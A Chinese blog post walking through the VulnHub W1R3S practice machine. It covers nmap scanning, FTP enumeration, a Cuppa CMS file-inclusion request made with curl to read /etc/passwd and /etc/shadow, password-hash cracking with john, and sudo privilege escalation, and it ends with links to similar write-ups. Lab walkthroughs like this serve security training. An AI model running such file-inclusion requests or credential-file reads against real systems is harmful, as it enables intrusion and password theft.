【学渗透靶机——W1R3S】

最新推荐文章于 2025-03-10 16:12:58 发布
最新推荐文章于 2025-03-10 16:12:58 发布
阅读量456 收藏 1
点赞数
分类专栏: 靶机学习 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jieli0901227/article/details/129904324
版权

学渗透靶机W1R3S

环境准备:

攻击机: kali
靶机:W1R3S
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

信息收集

主机发现

主机发现可以使用工具:

netdiscover
nmap

这里我们使用nmap确定靶机的ip地址

nmap -sn 192.168.241.0/24

在这里插入图片描述

端口信息收集

扫描主机开放的端口

nmap --min-rate 10000 -p- 192.168.241.147

在这里插入图片描述

对所开放的端口进行详细扫描

 nmap -sT -sV -O -p21,22,80,3306 192.168.241.147

在这里插入图片描述

渗透测试

使用nmap 脚本进行漏洞探测

nmap --script=vuln -p21,22,80,3306 192.168.241.147

在这里插入图片描述

这里发现没有可以直接利用的漏洞,接下来对每个端口对应的服务进行测试

ftp 服务渗透

登录靶机ftp

ftp 192.168.241.147
备注:登录ftp 后首先要执行binary ,下载后可执行文件不被损坏
        TXT可不执行,,

在这里插入图片描述
发现有三个目录 ,
在这里插入图片描述

浏览目录发现.txt 文件 ,通过mget 下载下来
在这里插入图片描述
查看第1个txt

root@kali:~# cat 01.txt     
New FTP Server For W1R3S.inc

没什么有用信息
查看第2个txt

root@kali:~# cat 02.txt
#
01ec2d8fc11c493b25029fb1f47f39ce
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

这是某种编码格式,使用工具分析:
在这里插入图片描述
02.txt 中第1个字符串可能是MD5
在这里插入图片描述

02.txt 中第2个字符串可能是base64,使用工具进行解密,也没有效信息
在这里插入图片描述
查看第3个txt
在这里插入图片描述
查看第4个txt

oot@kali:~# cat employee-names.txt
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

查看第5个txt

root@kali:~# cat worktodo.txt      
        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

通过在线工具进行翻转

we have a ןot of work to do‘ stop pןaying around˙˙˙˙

FTP渗透可能性不大

http服务渗透测试

1、通过浏览器进行

访问没什么有用的信息
在这里插入图片描述

2 目录爆破

常用目录爆破工具

gobuster 
dirb 
feroxbuster
通过目录扫描发现安装页面,尝试安装失败

在这里插入图片描述

发现使用的cuppa cms,

(1)通过searchsploit cuppa cms 发现有可利用的漏洞
在这里插入图片描述

漏洞利用:

漏洞下载:

root@kali:~# searchsploit cuppa cms  -m 25971.txt

漏洞验证

通过浏览器进行poc 验证

在这里插入图片描述
没有显示passwd , 查看25971 ,需要对参数值进行编码,

使用kali自带工具编码测试
root@kali:~# curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd  http://192.168.241.147/administrator/alerts/alertConfigField.php

在这里插入图片描述

既然能够爆出passwd 。尝试下能不能爆出shadow
        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
尝试破解shadow

linux shadow 的密码可以使用 工具john进行破解:
在这里插入图片描述
破解出两个账号的明文密码:

进行ssh 尝试登录

在这里插入图片描述

提权

获取初步权限,可以尝试进行提权:

收集w1r3s账号登录后的环境信息

操作系统信息

w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

当前用户的权限信息:
在这里插入图片描述
使用sudo 运行bash 进行提权

在这里插入图片描述

小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 420
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1390
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
vulnhub靶机实战——W1R3S
weixin_30294295的博客
05-13 441
环境 靶机ip:192.168.163.132 攻击机ip:192.168.163.129 目的:拿下靶机并获得root权限 渗透 首先nmap扫描端口 nmap -sC -sV 192.168.163.132 可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。 首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有...
网络安全工程师教你:Kali Linux渗透测试与FTP密码安全实战技巧
最新发布
Hacker_Fuchen的博客
03-10 801
给小伙伴们的意见是想清楚,自网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
w1r3s--靶机实操详解
qq_61802750的博客
08-05 956
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
w1r3s
学习!冲冲冲!
06-12 518
w1r3s
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 2033
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3706
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
靶场打靶机W1R3S 1.0.1(红队笔记)
qq_56764326的博客
12-11 376
ip a可以看到本地ip地址为192.168.172.135/24,主机在192.168.172.0、24的网段。下载靶机靶机的下载地址https://www.vulnhub.com/entry/w1r3s-101,220/,然后用vm虚拟机打开。出现一个虚拟机的登陆界面。注意将连接方式改为net连接,否则扫不到该靶机
W1R3S靶机全通详细教程
observer的博客
07-30 1503
W1R3S靶机全通详细教程
w1r3s 靶机
m0_63416413的博客
04-09 1358
w1r3s靶机习,随手记录,参照B站RedTeamNotes的视频习,红笔老登🤤
vulnhub靶机-w1r3s
TZXLzz的博客
07-17 1312
红队靶机初级,熟练使用nmap进行信息收集,ftp,web渗透
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 6017
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
靶机精讲之 W1R3S
m0_63285023的博客
04-04 617
New FTP Server For W1R3S.inc 记到笔记上(文本上因为到时候要用到)anonymous匿名登录,如果可以匿名登录则说明是没有密码的。查看文件2的编码形式 指令:hash-indentifier。-sT 说明用tcp协议(三次握手)扫描。把这段码保存下来(破解),像hash码。21,23,80,3306端口 +ip。把cuppa去掉,试一下,存在登录界面。zh注册尝试一下,有可能有注入漏洞。扫描到的目录要一个个查看(大致)可能存在编码问题(被包含文件)
【每日打靶练习】靶机渗透实操-W1R3S(易)
leo788的博客
12-29 1285
试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。开放端口有:21-ftp,22-ssh,80-http,3306-mysql。
W1R3S - VulnHub(漏洞靶机渗透测试)
Start C的博客
12-05 1133
VulnHub靶机习 - W1R3S
渗透靶场之W1R3S
m0_56190544的博客
06-26 659
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴习!
VulnHub-W1R3S: 1.0.1-靶机渗透
嗯嗯呐的博客
11-21 1908
**靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中等(CTF) 靶机描述:你被雇来对W1R3S做渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。 目标:得到root权限目录信息收集LFI漏洞利用john密码破解提权总结 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 1488
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值